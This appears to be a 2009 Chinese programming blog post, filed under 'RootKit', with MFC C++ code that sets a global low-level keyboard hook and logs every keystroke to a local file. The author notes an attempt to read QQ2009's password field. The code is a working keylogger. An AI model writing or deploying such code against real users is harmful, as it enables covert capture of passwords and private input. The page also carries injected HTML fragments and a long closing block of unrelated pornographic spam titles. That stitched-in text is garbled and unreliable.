• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

            About ShutDown of Windows(三)

            Posted on 2009-11-17 09:12 S.l.e!ep.¢% 閱讀(188) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
            接著 About ShutDown of Windows(二) ?繼續(xù),將代碼繼續(xù)改進(jìn)

            HHOOK?g_Hook;

            LRESULT?CALLBACK?MyKeyHook(
            int?code,?WPARAM?wParam,?LPARAM?lParam)
            {
            #if?(_WIN32_WINNT?<?0x0400)
            /*
            ?*?Structure?used?by?WH_KEYBOARD_LL
            ?
            */
            typedef?
            struct?tagKBDLLHOOKSTRUCT?{
            ????DWORD???vkCode;
            ????DWORD???scanCode;
            ????DWORD???flags;
            ????DWORD???time;
            ????DWORD???dwExtraInfo;
            }?KBDLLHOOKSTRUCT,?FAR?
            *LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
            #endif

            ????PKBDLLHOOKSTRUCT?kbDLLHOOK?
            =?(PKBDLLHOOKSTRUCT)lParam;
            ????
            ????
            const?char?*info?=?NULL;
            ????
            ????
            if?(wParam?==?WM_KEYDOWN)
            ????????info?
            =?"key?down";????
            ????
            else?if?(wParam?==?WM_KEYUP)
            ????????info?
            =?"key?up";
            ????
            else?if?(wParam?==?WM_SYSKEYDOWN)
            ????????info?
            =?"sys?key?down";????
            ????
            else?if?(wParam?==?WM_SYSKEYUP)
            ????????info?
            =?"sys?key?up";

            ????FILE
            *?f?=?fopen("hook.txt",?"a+");

            ????CString?strLog;
            ????strLog.Format(
            "%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);

            ????fwrite(strLog,?
            1,?strLog.GetLength(),?f);
            ????fclose(f);

            ????
            //?always?call?next?hook
            ????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
            }??????

            BOOL?CHookTestDlg::OnInitDialog()
            {
            ????CDialog::OnInitDialog();

            ????
            //?Add?"About"?menu?item?to?system?menu.

            ????
            //?IDM_ABOUTBOX?must?be?in?the?system?command?range.
            ????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
            ????ASSERT(IDM_ABOUTBOX?
            <?0xF000);

            ????CMenu
            *?pSysMenu?=?GetSystemMenu(FALSE);
            ????
            if?(pSysMenu?!=?NULL)
            ????{
            ????????CString?strAboutMenu;
            ????????strAboutMenu.LoadString(IDS_ABOUTBOX);
            ????????
            if?(!strAboutMenu.IsEmpty())
            ????????{
            ????????????pSysMenu
            ->AppendMenu(MF_SEPARATOR);
            ????????????pSysMenu
            ->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
            ????????}
            ????}

            ????
            //?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
            ????
            //??when?the?application's?main?window?is?not?a?dialog
            ????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
            ????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
            ????
            ????
            //?TODO:?Add?extra?initialization?here
            #ifndef?WH_KEYBOARD_LL
            ????
            #define?WH_KEYBOARD_LL?13
            #endif
            ????
            ????g_Hook?
            =?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
            ????
            ????
            if(?g_Hook?==?NULL?)
            ????????AfxMessageBox(
            "Failed?to?Set?Hook");
            ????
            ????
            return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
            }

            已經(jīng)實(shí)現(xiàn)了HOOK鍵盤消息(題外話:對于普通的程序確實(shí)可行,但對于QQ2009的PwdEdit顯示出來的東西是不對的,明顯QQ2009的PwdEdit對消息加密過)

            用 SysCheck 工具查看,這個EXE也并沒有注入到其它進(jìn)程

            MSDN的解釋
            WH_KEYBOARD_LL
            Windows NT/2000/XP: Installs a hook procedure that monitors low-level keyboard input events. For more information, see the LowLevelKeyboardProc hook procedure.

            If the input comes from a call to keybd_event, the input was "injected". However, the WH_KEYBOARD_LL hook is not injected into another process. Instead, the context switches back to the process that installed the hook and it is called in its original context. Then the context switches back to the application that generated the event.

            ???????? 一般情況下,全局消息鉤子要依賴于一個DLL才能夠正常工作。

            但實(shí)際上不是這樣的。有某些全局鉤子可以不依賴于任何DLL而正常工作的。這些鉤子包括,WH_JOURNALPLAYBACK,WH_JOURNALRECORD,WH_KEYBOARD_LL,WH_MOUSE_LL。為什么這些鉤子可以不依賴于DLL而正常工作呢?我們可以從MSDN中得到答案,MSDN中對于這四種鉤子都這樣的描述“This hook is called in the context of the thread that installed it.”,翻譯成中文意思是鉤子函數(shù)的調(diào)用是在安裝鉤子的線程上下文中進(jìn)行的,說得更明白些,意思就是這些鉤子是在哪個線程當(dāng)中安裝的,其鉤子函數(shù)就在哪個線程中執(zhí)行。所以使用這四種鉤子是達(dá)不到代碼注入的效果的,當(dāng)然也就可以不依賴于任何DLL了。MSDN中只對個別鉤子指出了必須還是沒有必要使用DLL。



            99久久精品国产一区二区三区| 久久亚洲国产成人影院网站| 蜜臀av性久久久久蜜臀aⅴ| 乱亲女H秽乱长久久久| 四虎国产精品免费久久5151| 久久综合亚洲鲁鲁五月天| A狠狠久久蜜臀婷色中文网| 人妻少妇精品久久| 久久久中文字幕| 日韩精品久久无码人妻中文字幕 | 久久综合丁香激情久久| 日本精品久久久久影院日本| 国产成年无码久久久久毛片| 国产精品99久久久精品无码| 久久97久久97精品免视看| 国产欧美一区二区久久| 亚洲精品高清国产一线久久| 性高湖久久久久久久久AAAAA| 久久久精品免费国产四虎| 久久久免费精品re6| 欧美激情一区二区久久久| 久久久久亚洲爆乳少妇无| 久久se精品一区精品二区国产| 国产亚洲婷婷香蕉久久精品 | 久久精品人成免费| 色婷婷综合久久久久中文| 亚洲中文久久精品无码| 波多野结衣AV无码久久一区| 国产免费久久精品99re丫y| 久久亚洲电影| 国内精品久久久久影院亚洲| 久久人人爽人人爽人人片AV东京热| 国产ww久久久久久久久久| 精品久久一区二区| 国产精品女同一区二区久久| 国产精品欧美亚洲韩国日本久久 | 亚洲午夜久久久影院| 亚洲AV无码1区2区久久| 久久久久99精品成人片欧美| 好属妞这里只有精品久久| 久久国产精品-久久精品|